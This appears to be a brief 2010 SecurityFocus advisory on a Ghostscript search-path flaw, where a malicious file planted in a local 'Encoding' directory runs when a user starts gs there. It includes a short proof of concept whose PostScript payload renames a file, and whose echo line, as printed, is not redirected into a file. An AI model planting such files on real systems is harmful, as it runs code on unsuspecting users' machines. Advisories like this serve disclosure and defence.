Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to run the application from the directory where a malicious file is stored.

The following proof-of-concept is available:

mkdir Encoding
echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit'
gs


 

Privacy Statement
Copyright 2010, SecurityFocus